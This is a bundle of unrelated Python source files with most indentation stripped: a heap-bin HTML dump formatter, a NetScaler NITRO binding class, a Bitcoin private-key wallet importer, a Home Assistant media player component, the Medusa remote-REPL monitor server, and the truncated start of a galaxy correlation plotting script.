small_bin_fd.string = "smallbin["+str(i)+"]{fd}-> 0x" + line[1] + line[0]
div_libcdump.append(small_bin_fd)
div_space = self.soup.new_tag('div')
div_space['style'] = "font-size:0;height:5px;"
div_libcdump.append(div_space)
small_bin_bk = self.soup.new_tag('div')
small_bin_bk['style'] = "font-family: monospace;display:inline;"
small_bin_bk.string = "smallbin["+str(i)+"]{bk}-> 0x" + nextline[1] + nextline[0]
div_libcdump.append(small_bin_bk)
div_space = self.soup.new_tag('div')
div_space['style'] = "font-size:0;height:5px;"
div_libcdump.append(div_space)
line = nextline
line = line[2:]
else:
small_bin_fd = self.soup.new_tag('div')
small_bin_fd['style'] = "font-family: monospace;display:inline;"
small_bin_fd.string = "smallbin["+str(i)+"]{fd}-> 0x" + line[1] + line[0]
div_libcdump.append(small_bin_fd)
div_space = self.soup.new_tag('div')
div_space['style'] = "font-size:0;height:5px;"
div_libcdump.append(div_space)
line = line[2:]
small_bin_bk = self.soup.new_tag('div')
small_bin_bk['style'] = "font-family: monospace;display:inline;"
small_bin_bk.string = "smallbin["+str(i)+"]{bk}-> 0x" + line[1] + line[0]
div_libcdump.append(small_bin_bk)
div_space = self.soup.new_tag('div')
div_space['style'] = "font-size:0;height:5px;"
div_libcdump.append(div_space)
line = line[2:]
#large bins
for i in xrange(0,63,1):
if len(line) == 2:
nextline = f.readline().rstrip().split(" ")
nextline = nextline[1:]
large_bin_fd = self.soup.new_tag('div')
large_bin_fd['style'] = "font-family: monospace;display:inline;"
large_bin_fd.string = "largebin["+str(i)+"]{fd}-> 0x" + line[1] + line[0]
div_libcdump.append(large_bin_fd)
div_space = self.soup.new_tag('div')
div_space['style'] = "font-size:0;height:5px;"
div_libcdump.append(div_space)
large_bin_bk = self.soup.new_tag('div')
large_bin_bk['style'] = "font-family: monospace;display:inline;"
large_bin_bk.string = "largebin["+str(i)+"]{bk}-> 0x" + nextline[1] + nextline[0]
div_libcdump.append(large_bin_bk)
div_space = self.soup.new_tag('div')
div_space['style'] = "font-size:0;height:5px;"
div_libcdump.append(div_space)
line = nextline
line = line[2:]
else:
large_bin_fd = self.soup.new_tag('div')
large_bin_fd['style'] = "font-family: monospace;display:inline;"
large_bin_fd.string = "largebin["+str(i)+"]{fd}-> 0x" + line[1] + line[0]
div_libcdump.append(large_bin_fd)
div_space = self.soup.new_tag('div')
div_space['style'] = "font-size:0;height:5px;"
div_libcdump.append(div_space)
line = line[2:]
large_bin_bk = self.soup.new_tag('div')
large_bin_bk['style'] = "font-family: monospace;display:inline;"
large_bin_bk.string = "largebin["+str(i)+"]{bk}-> 0x" + line[1] + line[0]
div_libcdump.append(large_bin_bk)
div_space = self.soup.new_tag('div')
div_space['style'] = "font-size:0;height:5px;"
div_libcdump.append(div_space)
line = line[2:]
|
|
#
# Copyright (c) 2008-2015 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class crvserver_filterpolicy_binding(base_resource) :
""" Binding class showing the filterpolicy that can be bound to crvserver.
"""
def __init__(self) :
self._policyname = ""
self._priority = 0
self._inherited = ""
self._name = ""
self._targetvserver = ""
self.___count = 0
@property
def priority(self) :
ur"""The priority for the policy.
"""
try :
return self._priority
except Exception as e:
raise e
@priority.setter
def priority(self, priority) :
ur"""The priority for the policy.
"""
try :
self._priority = priority
except Exception as e:
raise e
@property
def policyname(self) :
ur"""Policies bound to this vserver.
"""
try :
return self._policyname
except Exception as e:
raise e
@policyname.setter
def policyname(self, policyname) :
ur"""Policies bound to this vserver.
"""
try :
self._policyname = policyname
except Exception as e:
raise e
@property
def name(self) :
ur"""Name of the cache redirection virtual server to which to bind the cache redirection policy.<br/>Minimum length = 1.
"""
try :
return self._name
except Exception as e:
raise e
@name.setter
def name(self, name) :
ur"""Name of the cache redirection virtual server to which to bind the cache redirection policy.<br/>Minimum length = 1
"""
try :
self._name = name
except Exception as e:
raise e
@property
def targetvserver(self) :
ur"""Name of the virtual server to which content is forwarded. Applicable only if the policy is a map policy and the cache redirection virtual server is of type REVERSE.
"""
try :
return self._targetvserver
except Exception as e:
raise e
@targetvserver.setter
def targetvserver(self, targetvserver) :
ur"""Name of the virtual server to which content is forwarded. Applicable only if the policy is a map policy and the cache redirection virtual server is of type REVERSE.
"""
try :
self._targetvserver = targetvserver
except Exception as e:
raise e
@property
def inherited(self) :
ur"""On State describes that policy bound is inherited from global binding.<br/>Possible values = ON, OFF.
"""
try :
return self._inherited
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
ur""" converts nitro response into object and returns the object array in case of get request.
"""
try :
result = service.payload_formatter.string_to_resource(crvserver_filterpolicy_binding_response, response, self.__class__.__name__)
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.crvserver_filterpolicy_binding
except Exception as e :
raise e
def _get_object_name(self) :
ur""" Returns the value of object identifier argument
"""
try :
if self.name is not None :
return str(self.name)
return None
except Exception as e :
raise e
@classmethod
def add(cls, client, resource) :
try :
if resource and type(resource) is not list :
updateresource = crvserver_filterpolicy_binding()
updateresource.name = resource.name
updateresource.policyname = resource.policyname
updateresource.targetvserver = resource.targetvserver
updateresource.priority = resource.priority
return updateresource.update_resource(client)
else :
if resource and len(resource) > 0 :
updateresources = [crvserver_filterpolicy_binding() for _ in range(len(resource))]
for i in range(len(resource)) :
updateresources[i].name = resource[i].name
updateresources[i].policyname = resource[i].policyname
updateresources[i].targetvserver = resource[i].targetvserver
updateresources[i].priority = resource[i].priority
return cls.update_bulk_request(client, updateresources)
except Exception as e :
raise e
@classmethod
def delete(cls, client, resource) :
try :
if resource and type(resource) is not list :
deleteresource = crvserver_filterpolicy_binding()
deleteresource.name = resource.name
deleteresource.policyname = resource.policyname
return deleteresource.delete_resource(client)
else :
if resource and len(resource) > 0 :
deleteresources = [crvserver_filterpolicy_binding() for _ in range(len(resource))]
for i in range(len(resource)) :
deleteresources[i].name = resource[i].name
deleteresources[i].policyname = resource[i].policyname
return cls.delete_bulk_request(client, deleteresources)
except Exception as e :
raise e
@classmethod
def get(cls, service, name) :
ur""" Use this API to fetch crvserver_filterpolicy_binding resources.
"""
try :
obj = crvserver_filterpolicy_binding()
obj.name = name
response = obj.get_resources(service)
return response
except Exception as e:
raise e
@classmethod
def get_filtered(cls, service, name, filter_) :
ur""" Use this API to fetch filtered set of crvserver_filterpolicy_binding resources.
		Filter string should be in JSON format, e.g.: "port:80,servicetype:HTTP".
"""
try :
obj = crvserver_filterpolicy_binding()
obj.name = name
option_ = options()
option_.filter = filter_
response = obj.getfiltered(service, option_)
return response
except Exception as e:
raise e
@classmethod
def count(cls, service, name) :
ur""" Use this API to count crvserver_filterpolicy_binding resources configued on NetScaler.
"""
try :
obj = crvserver_filterpolicy_binding()
obj.name = name
option_ = options()
option_.count = True
response = obj.get_resources(service, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e:
raise e
@classmethod
def count_filtered(cls, service, name, filter_) :
ur""" Use this API to count the filtered set of crvserver_filterpolicy_binding resources.
		Filter string should be in JSON format, e.g.: "port:80,servicetype:HTTP".
"""
try :
obj = crvserver_filterpolicy_binding()
obj.name = name
option_ = options()
option_.count = True
option_.filter = filter_
response = obj.getfiltered(service, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e:
raise e
class Inherited:
ON = "ON"
OFF = "OFF"
class crvserver_filterpolicy_binding_response(base_response) :
def __init__(self, length=1) :
self.crvserver_filterpolicy_binding = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.crvserver_filterpolicy_binding = [crvserver_filterpolicy_binding() for _ in range(length)]
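# Hedged usage sketch (assumes an authenticated nitro_service instance `client`):
#   bindings = crvserver_filterpolicy_binding.get(client, "my_crvserver")
#   total = crvserver_filterpolicy_binding.count(client, "my_crvserver")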
|
|
#!/usr/bin/env python
# Bitcoin private key importer
# Copyright (C) 2011 by Matt Giuca
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
# Instructions:
# Requirements: bitcointools in the Python path.
# Commit d3a1daf (Feb 24, 2011) or later is required.
# Don't ask me why Git version IDs are so hard to compare!
# Bitcoin version 0.3.20 (for -rescan).
# Recommended: A version of pycrypto in the Python path which supports
# RIPEMD160 hashing (not the Debian/Ubuntu version).
# The program 'priv_der' compiled in the current directory
# (required if supplying a small 32-byte key).
# 1. Get the private key you wish to import in a text file (this file can
# contain whitespace or newlines, and be in base-58 or base-64).
# Alternatively, it can be a binary file.
# This can be either a small 32-byte private key, or a full 279-byte DER
# key (including the private key). Note that 'priv_der' must be compiled
# if a small key is supplied.
# 2. Run privkeyimport.py KEYFILE. This will write the key into your Bitcoin
# wallet. Use -n to just print without writing to the wallet.
# Use --base64 if the input is base-64, -b if it is binary.
# 3. Run bitcoin -rescan to ensure any transactions belonging to the
# imported key are added to the transaction list and balance.
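# Example invocations (hypothetical file names; the flags match the option
# parser defined in main() below):
#   python privkeyimport.py -n mykey.txt        # dry run, base-58 input
#   python privkeyimport.py --base64 mykey.b64  # base-64 input
#   python privkeyimport.py -b mykey.der        # binary input
#   bitcoin -rescan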
import sys
import optparse
import re
import binascii
import logging
import subprocess
import bsddb.db
# BitcoinTools
#from bitcointools import util
#from bitcointools import wallet
#from bitcointools import base58
import util
import wallet
import base58
def getTextLines(text):
    'Get all the lines of a text.'
textLines = text.replace('\r', '\n').replace('\n\n', '\n').split('\n')
if len(textLines) == 1:
if textLines[0] == '':
return []
return textLines
def privkey_b58_bin(priv_b58):
"""Convert a base-58 private key (ignoring whitespace) into a binary
string."""
# Cut out whitespace
priv_b58 = re.sub("[ \t\n]", "", priv_b58)
if len(priv_b58) == 381:
return base58.b58decode(priv_b58, 279)
elif len(priv_b58) == 44:
return base58.b58decode(priv_b58, 32)
else:
raise ValueError("Expected a key of 44 or 381 base-58 digits")
def privkey_b64_bin(priv_b64):
"""Convert a base-64 private key (ignoring whitespace) into a binary
string."""
# Cut out whitespace
priv_b64 = re.sub("[ \t\n]", "", priv_b64)
if len(priv_b64) in (44, 372):
return binascii.a2b_base64(priv_b64)
else:
raise ValueError("Expected a key of 44 or 372 base-64 digits")
def priv_to_der(priv):
"""Convert a small 32-byte private key into a full 279-byte DER key
(including the public key).
This requires that priv_der has been compiled.
priv must be a binary string of 32 bytes.
"""
p = subprocess.Popen(['./priv_der'], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
stdout, stderr = p.communicate(priv)
return stdout
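# Hedged sketch of the key-expansion pipeline used by import_key() below:
#   priv_bin = privkey_b58_bin(text)  # 32 bytes from 44 base-58 digits
#   priv_bin = priv_to_der(priv_bin)  # expand to the full 279-byte DER key
#   pub_bin = priv_bin[-65:]          # the public key is the last 65 bytes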
def import_key(keyLine, db_dir, input_mode="b58", dryrun=False,verbose=False):
if len(keyLine.strip()) == 0:
return
if input_mode == "b58":
priv_bin = privkey_b58_bin(keyLine)
elif input_mode == "b64":
priv_bin = privkey_b64_bin(keyLine)
elif input_mode == "bin":
if len(keyLine) not in (32, 279):
raise ValueError("Expected a key of 32 or 279 bytes")
priv_bin = keyLine
if len(priv_bin) == 32:
# Get the full DER key
priv_bin = priv_to_der(priv_bin)
# The public key of a DER-encoded private key is just the last 65 bytes
pub_bin = priv_bin[-65:]
# Print out the key and address
if verbose:
print "Private key: %s" % util.long_hex(priv_bin)
print "Public key: %s" % util.long_hex(pub_bin)
else:
print "Private key: %s" % util.short_hex(priv_bin)
print "Public key: %s" % util.short_hex(pub_bin)
addr = base58.public_key_to_bc_address(pub_bin)
if addr == '':
# This can happen if pycrypto is not installed, or if the RIPEMD160
# hash is not available (it has been removed in the Debian/Ubuntu
# version)
print "Warning: Cannot calculate address; check pycrypto library"
else:
print "Address: %s" % addr
# Data for wallet.update_wallet
data = {
'private_key': priv_bin,
'public_key': pub_bin,
}
try:
db_env = util.create_env(db_dir)
except bsddb.db.DBNoSuchFileError:
logging.error("Couldn't open " + db_dir)
sys.exit(1)
if not dryrun:
db = wallet.open_wallet(db_env, writable=True)
wallet.update_wallet(db, 'key', data)
db.close()
def main(args=None):
# Usage message without all of the options
usage = """%prog [OPTIONS] KEYFILE
Import a private key into your Bitcoin wallet.
The private key must be a full 279-byte DER key. By default, it must be in
base58 notation (and may have whitespace). This may be changed to base64
or binary input."""
if args is None:
args = sys.argv[1:]
    fileName = None
# Parse arguments and options
parser = optparse.OptionParser(usage)
parser.add_option("-n", "--dry-run",
action="store_true", dest="dryrun", default=False,
help="don't actually write to the wallet")
parser.add_option("-v", "--verbose",
action="store_true", dest="verbose", default=False,
help="print out the full public/private keys")
parser.add_option("--datadir",
action="store", dest="datadir", default=None,
help="look for files here (defaults to bitcoin default)")
parser.add_option("-b", "--binary",
action="store_true", dest="input_bin", default=False,
help="input file is binary (not base58)")
parser.add_option("--base64",
action="store_true", dest="input_b64", default=False,
help="input file is base64 (not base58)")
    (options, args) = parser.parse_args(args)
    if len(args) >= 1:
        fileName = args[0]
if options.input_bin and options.input_b64:
parser.error("Can't specify both --binary and --base64.")
elif options.input_bin:
input_mode = "bin"
elif options.input_b64:
input_mode = "b64"
else:
input_mode = "b58"
    if fileName is None:
keyfile = sys.stdin
else:
keyfile = open(fileName, 'rb' if options.input_bin else 'r')
if options.datadir is None:
db_dir = util.determine_db_dir()
else:
db_dir = options.datadir
for keyLine in getTextLines(keyfile.read()):
import_key(keyLine, db_dir, input_mode=input_mode, dryrun=options.dryrun, verbose=options.verbose)
keyfile.close()
if __name__ == "__main__":
sys.exit(main())
|
|
"""
homeassistant.components.media_player
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Component to interface with various media players
"""
import logging
from homeassistant.components import discovery
from homeassistant.helpers.device import Device
from homeassistant.helpers.device_component import DeviceComponent
from homeassistant.const import (
ATTR_ENTITY_ID, SERVICE_TURN_OFF, SERVICE_VOLUME_UP,
SERVICE_VOLUME_DOWN, SERVICE_MEDIA_PLAY_PAUSE, SERVICE_MEDIA_PLAY,
SERVICE_MEDIA_PAUSE, SERVICE_MEDIA_NEXT_TRACK, SERVICE_MEDIA_PREV_TRACK)
DOMAIN = 'media_player'
DEPENDENCIES = []
SCAN_INTERVAL = 30
ENTITY_ID_FORMAT = DOMAIN + '.{}'
DISCOVERY_PLATFORMS = {
discovery.services.GOOGLE_CAST: 'cast',
}
SERVICE_YOUTUBE_VIDEO = 'play_youtube_video'
STATE_NO_APP = 'idle'
ATTR_STATE = 'state'
ATTR_OPTIONS = 'options'
ATTR_MEDIA_STATE = 'media_state'
ATTR_MEDIA_CONTENT_ID = 'media_content_id'
ATTR_MEDIA_TITLE = 'media_title'
ATTR_MEDIA_ARTIST = 'media_artist'
ATTR_MEDIA_ALBUM = 'media_album'
ATTR_MEDIA_IMAGE_URL = 'media_image_url'
ATTR_MEDIA_VOLUME = 'media_volume'
ATTR_MEDIA_DURATION = 'media_duration'
MEDIA_STATE_UNKNOWN = 'unknown'
MEDIA_STATE_PLAYING = 'playing'
MEDIA_STATE_STOPPED = 'stopped'
YOUTUBE_COVER_URL_FORMAT = 'http://img.youtube.com/vi/{}/1.jpg'
def is_on(hass, entity_id=None):
""" Returns true if specified media player entity_id is on.
    Will check all media players if no entity_id specified. """
entity_ids = [entity_id] if entity_id else hass.states.entity_ids(DOMAIN)
return any(not hass.states.is_state(entity_id, STATE_NO_APP)
for entity_id in entity_ids)
def turn_off(hass, entity_id=None):
""" Will turn off specified media player or all. """
data = {ATTR_ENTITY_ID: entity_id} if entity_id else {}
hass.services.call(DOMAIN, SERVICE_TURN_OFF, data)
def volume_up(hass, entity_id=None):
""" Send the media player the command for volume up. """
data = {ATTR_ENTITY_ID: entity_id} if entity_id else {}
hass.services.call(DOMAIN, SERVICE_VOLUME_UP, data)
def volume_down(hass, entity_id=None):
""" Send the media player the command for volume down. """
data = {ATTR_ENTITY_ID: entity_id} if entity_id else {}
hass.services.call(DOMAIN, SERVICE_VOLUME_DOWN, data)
def media_play_pause(hass, entity_id=None):
""" Send the media player the command for play/pause. """
data = {ATTR_ENTITY_ID: entity_id} if entity_id else {}
hass.services.call(DOMAIN, SERVICE_MEDIA_PLAY_PAUSE, data)
def media_play(hass, entity_id=None):
""" Send the media player the command for play/pause. """
data = {ATTR_ENTITY_ID: entity_id} if entity_id else {}
hass.services.call(DOMAIN, SERVICE_MEDIA_PLAY, data)
def media_pause(hass, entity_id=None):
""" Send the media player the command for play/pause. """
data = {ATTR_ENTITY_ID: entity_id} if entity_id else {}
hass.services.call(DOMAIN, SERVICE_MEDIA_PAUSE, data)
def media_next_track(hass, entity_id=None):
""" Send the media player the command for next track. """
data = {ATTR_ENTITY_ID: entity_id} if entity_id else {}
hass.services.call(DOMAIN, SERVICE_MEDIA_NEXT_TRACK, data)
def media_prev_track(hass, entity_id=None):
""" Send the media player the command for prev track. """
data = {ATTR_ENTITY_ID: entity_id} if entity_id else {}
hass.services.call(DOMAIN, SERVICE_MEDIA_PREV_TRACK, data)
SERVICE_TO_METHOD = {
    SERVICE_TURN_OFF: 'turn_off',
    SERVICE_VOLUME_UP: 'volume_up',
    SERVICE_VOLUME_DOWN: 'volume_down',
    SERVICE_MEDIA_PLAY_PAUSE: 'media_play_pause',
    SERVICE_MEDIA_PLAY: 'media_play',
    SERVICE_MEDIA_PAUSE: 'media_pause',
    SERVICE_MEDIA_NEXT_TRACK: 'media_next_track',
    SERVICE_MEDIA_PREV_TRACK: 'media_prev_track',
}
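# Hedged usage sketch: each service name maps straight onto a
# MediaPlayerDevice method of the same name, so these two calls are
# equivalent once setup() has registered the handler:
#   volume_up(hass)
#   hass.services.call(DOMAIN, SERVICE_VOLUME_UP, {})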
def setup(hass, config):
""" Track states and offer events for media_players. """
component = DeviceComponent(
logging.getLogger(__name__), DOMAIN, hass, SCAN_INTERVAL,
DISCOVERY_PLATFORMS)
component.setup(config)
def media_player_service_handler(service):
""" Maps services to methods on MediaPlayerDevice. """
target_players = component.extract_from_service(service)
method = SERVICE_TO_METHOD[service.service]
for player in target_players:
getattr(player, method)()
if player.should_poll:
player.update_ha_state(True)
for service in SERVICE_TO_METHOD:
hass.services.register(DOMAIN, service, media_player_service_handler)
def play_youtube_video_service(service, media_id):
""" Plays specified media_id on the media player. """
target_players = component.extract_from_service(service)
if media_id:
for player in target_players:
player.play_youtube(media_id)
hass.services.register(DOMAIN, "start_fireplace",
lambda service:
play_youtube_video_service(service, "eyU3bRy2x44"))
hass.services.register(DOMAIN, "start_epic_sax",
lambda service:
play_youtube_video_service(service, "kxopViU98Xo"))
hass.services.register(DOMAIN, SERVICE_YOUTUBE_VIDEO,
lambda service:
play_youtube_video_service(
service, service.data.get('video')))
return True
class MediaPlayerDevice(Device):
""" ABC for media player devices. """
def turn_off(self):
""" turn_off media player. """
pass
def volume_up(self):
""" volume_up media player. """
pass
def volume_down(self):
""" volume_down media player. """
pass
def media_play_pause(self):
""" media_play_pause media player. """
pass
def media_play(self):
""" media_play media player. """
pass
def media_pause(self):
""" media_pause media player. """
pass
    def media_next_track(self):
        """ media_next_track media player. """
        pass
    def media_prev_track(self):
        """ media_prev_track media player. """
        pass
def play_youtube(self, media_id):
""" Plays a YouTube media. """
pass
|
|
# -*- Mode: Python -*-
# Author: Sam Rushing <rushing@nightmare.com>
#
# python REPL channel.
#
RCS_ID = '$Id: monitor.py,v 1.5 2002/03/23 15:08:06 amk Exp $'
import md5
import socket
import string
import sys
import time
VERSION = string.split(RCS_ID)[2]
import asyncore_25 as asyncore
import asynchat_25 as asynchat
from counter import counter
import producers
class monitor_channel (asynchat.async_chat):
try_linemode = 1
def __init__ (self, server, sock, addr):
asynchat.async_chat.__init__ (self, sock)
self.server = server
self.addr = addr
self.set_terminator ('\r\n')
self.data = ''
# local bindings specific to this channel
self.local_env = sys.modules['__main__'].__dict__.copy()
self.push ('Python ' + sys.version + '\r\n')
self.push (sys.copyright+'\r\n')
self.push ('Welcome to %s\r\n' % self)
self.push ("[Hint: try 'from __main__ import *']\r\n")
self.prompt()
self.number = server.total_sessions.as_long()
self.line_counter = counter()
self.multi_line = []
def handle_connect (self):
# send IAC DO LINEMODE
self.push ('\377\375\"')
def close (self):
self.server.closed_sessions.increment()
asynchat.async_chat.close(self)
def prompt (self):
self.push ('>>> ')
def collect_incoming_data (self, data):
self.data = self.data + data
if len(self.data) > 1024:
# denial of service.
self.push ('BCNU\r\n')
self.close_when_done()
def found_terminator (self):
line = self.clean_line (self.data)
self.data = ''
self.line_counter.increment()
# check for special case inputs...
if not line and not self.multi_line:
self.prompt()
return
if line in ['\004', 'exit']:
self.push ('BCNU\r\n')
self.close_when_done()
return
oldout = sys.stdout
olderr = sys.stderr
try:
p = output_producer(self, olderr)
sys.stdout = p
sys.stderr = p
try:
# this is, of course, a blocking operation.
# if you wanted to thread this, you would have
# to synchronize, etc... and treat the output
# like a pipe. Not Fun.
#
# try eval first. If that fails, try exec. If that fails,
# hurl.
try:
if self.multi_line:
# oh, this is horrible...
raise SyntaxError
co = compile (line, repr(self), 'eval')
result = eval (co, self.local_env)
method = 'eval'
if result is not None:
print repr(result)
self.local_env['_'] = result
except SyntaxError:
try:
if self.multi_line:
if line and line[0] in [' ','\t']:
self.multi_line.append (line)
self.push ('... ')
return
else:
self.multi_line.append (line)
line = string.join (self.multi_line, '\n')
co = compile (line, repr(self), 'exec')
self.multi_line = []
else:
co = compile (line, repr(self), 'exec')
except SyntaxError, why:
if why[0] == 'unexpected EOF while parsing':
self.push ('... ')
self.multi_line.append (line)
return
else:
t,v,tb = sys.exc_info()
del tb
raise t,v
exec co in self.local_env
method = 'exec'
except:
method = 'exception'
self.multi_line = []
(file, fun, line), t, v, tbinfo = asyncore.compact_traceback()
self.log_info('%s %s %s' %(t, v, tbinfo), 'warning')
finally:
sys.stdout = oldout
sys.stderr = olderr
self.log_info('%s:%s (%s)> %s' % (
self.number,
self.line_counter,
method,
repr(line))
)
self.push_with_producer (p)
self.prompt()
# for now, we ignore any telnet option stuff sent to
# us, and we process the backspace key ourselves.
# gee, it would be fun to write a full-blown line-editing
# environment, etc...
def clean_line (self, line):
chars = []
for ch in line:
oc = ord(ch)
if oc < 127:
if oc in [8,177]:
# backspace
chars = chars[:-1]
else:
chars.append (ch)
return string.join (chars, '')
class monitor_server (asyncore.dispatcher):
SERVER_IDENT = 'Monitor Server (V%s)' % VERSION
channel_class = monitor_channel
def __init__ (self, hostname='127.0.0.1', port=8023):
asyncore.dispatcher.__init__(self)
self.hostname = hostname
self.port = port
self.create_socket (socket.AF_INET, socket.SOCK_STREAM)
self.set_reuse_addr()
self.bind ((hostname, port))
self.log_info('%s started on port %d' % (self.SERVER_IDENT, port))
self.listen (5)
self.closed = 0
self.failed_auths = 0
self.total_sessions = counter()
self.closed_sessions = counter()
def writable (self):
return 0
def handle_accept (self):
conn, addr = self.accept()
self.log_info('Incoming monitor connection from %s:%d' % addr)
self.channel_class (self, conn, addr)
self.total_sessions.increment()
def status (self):
return producers.simple_producer (
'<h2>%s</h2>' % self.SERVER_IDENT
+ '<br><b>Total Sessions:</b> %s' % self.total_sessions
+ '<br><b>Current Sessions:</b> %d' % (
self.total_sessions.as_long()-self.closed_sessions.as_long()
)
)
def hex_digest (s):
m = md5.md5()
m.update (s)
return string.joinfields (
map (lambda x: hex (ord (x))[2:], map (None, m.digest())),
'',
)
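# Hedged client-side sketch of the handshake implemented by
# secure_monitor_channel below: the server pushes a timestamp line and the
# client must answer with hex_digest (timestamp + password).
#
# def monitor_login (host, port, password):
#     s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
#     s.connect ((host, port))
#     timestamp = s.recv (1024).strip()
#     s.send (hex_digest (timestamp + password) + '\r\n')
#     return s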
class secure_monitor_channel (monitor_channel):
authorized = 0
def __init__ (self, server, sock, addr):
asynchat.async_chat.__init__ (self, sock)
self.server = server
self.addr = addr
self.set_terminator ('\r\n')
self.data = ''
# local bindings specific to this channel
self.local_env = {}
# send timestamp string
self.timestamp = str(time.time())
self.count = 0
self.line_counter = counter()
self.number = int(server.total_sessions.as_long())
self.multi_line = []
self.push (self.timestamp + '\r\n')
def found_terminator (self):
if not self.authorized:
if hex_digest ('%s%s' % (self.timestamp, self.server.password)) != self.data:
self.log_info ('%s: failed authorization' % self, 'warning')
self.server.failed_auths = self.server.failed_auths + 1
self.close()
else:
self.authorized = 1
self.push ('Python ' + sys.version + '\r\n')
self.push (sys.copyright+'\r\n')
self.push ('Welcome to %s\r\n' % self)
self.prompt()
self.data = ''
else:
monitor_channel.found_terminator (self)
class secure_encrypted_monitor_channel (secure_monitor_channel):
"Wrap send() and recv() with a stream cipher"
def __init__ (self, server, conn, addr):
key = server.password
self.outgoing = server.cipher.new (key)
self.incoming = server.cipher.new (key)
secure_monitor_channel.__init__ (self, server, conn, addr)
def send (self, data):
# send the encrypted data instead
ed = self.outgoing.encrypt (data)
return secure_monitor_channel.send (self, ed)
def recv (self, block_size):
data = secure_monitor_channel.recv (self, block_size)
if data:
dd = self.incoming.decrypt (data)
return dd
else:
return data
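# The cipher installed on the server is duck-typed: it only needs a
# new(key) factory returning an object with encrypt(data) and
# decrypt(data) (the `sapphire` module imported in __main__ below is one
# such provider). A do-nothing stand-in for testing the plumbing:
class _null_stream:
        def encrypt (self, data):
                return data
        def decrypt (self, data):
                return data
class null_cipher:
        def new (self, key):
                return _null_stream()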
class secure_monitor_server (monitor_server):
channel_class = secure_monitor_channel
def __init__ (self, password, hostname='', port=8023):
monitor_server.__init__ (self, hostname, port)
self.password = password
def status (self):
p = monitor_server.status (self)
# kludge
p.data = p.data + ('<br><b>Failed Authorizations:</b> %d' % self.failed_auths)
return p
# don't try to print from within any of the methods
# of this object. 8^)
class output_producer:
def __init__ (self, channel, real_stderr):
self.channel = channel
self.data = ''
# use _this_ for debug output
self.stderr = real_stderr
def check_data (self):
if len(self.data) > 1<<16:
# runaway output, close it.
self.channel.close()
def write (self, data):
lines = string.splitfields (data, '\n')
data = string.join (lines, '\r\n')
self.data = self.data + data
self.check_data()
def writeline (self, line):
self.data = self.data + line + '\r\n'
self.check_data()
def writelines (self, lines):
self.data = self.data + string.joinfields (
lines,
'\r\n'
) + '\r\n'
self.check_data()
def flush (self):
pass
def softspace (self, *args):
pass
def more (self):
if self.data:
result = self.data[:512]
self.data = self.data[512:]
return result
else:
return ''
if __name__ == '__main__':
if '-s' in sys.argv:
sys.argv.remove ('-s')
print 'Enter password: ',
password = raw_input()
else:
password = None
if '-e' in sys.argv:
sys.argv.remove ('-e')
encrypt = 1
else:
encrypt = 0
if len(sys.argv) > 1:
port = string.atoi (sys.argv[1])
else:
port = 8023
if password is not None:
s = secure_monitor_server (password, '', port)
if encrypt:
s.channel_class = secure_encrypted_monitor_channel
import sapphire
s.cipher = sapphire
else:
s = monitor_server ('', port)
asyncore.loop(use_poll=1)
|
|
import sys
import numpy as np
import matplotlib.pyplot as plt
################################################################################
# main
################################################################################
def main():
############################################################################
# Open the files and read the data.
#
# You may prefer to manually edit the filename and number of galaxies
# in the datasets.
############################################################################
# Read in off the command line some string to look for in the
# input files.
'''
tag = 'logbinning_GPU_100k'
if len(sys.argv)>=2:
tag = sys.argv[1]
'''
filenames = [None,None,None,None]
filenames[0] = sys.argv[1] # DD
#filenames[1] = filenames[0].replace("data","flat") # RR
#filenames[2] = filenames[0].replace("data_data","data_flat") # DR
filenames[1] = filenames[0].replace("DD","RR") # RR
filenames[2] = filenames[0].replace("DD","DRa") # DR
filenames[3] = filenames[0].replace("DD","DRb") # DR
tag = filenames[0].split("DD_")[1].split('.')[0]
    # Pull the number of galaxies out of the file name.
    #ngal_in_file = tag.split('_')[-1][0:-1]
    #ngalaxies = float(ngal_in_file)*1000.0
    # Fallback galaxy counts; these are overwritten below by the totals
    # read from the first line of the DD and RR files.
    nd = 101292.
    nr = 57997.
############################################################################
############################################################################
dd = None
rr = None
dr = None
bin_lo = None
bin_hi = None
numbers = []
# Loop over the files and pull out the necessary info.
for i,name in enumerate(filenames):
print "Opening: ",name
#infile = open(name)
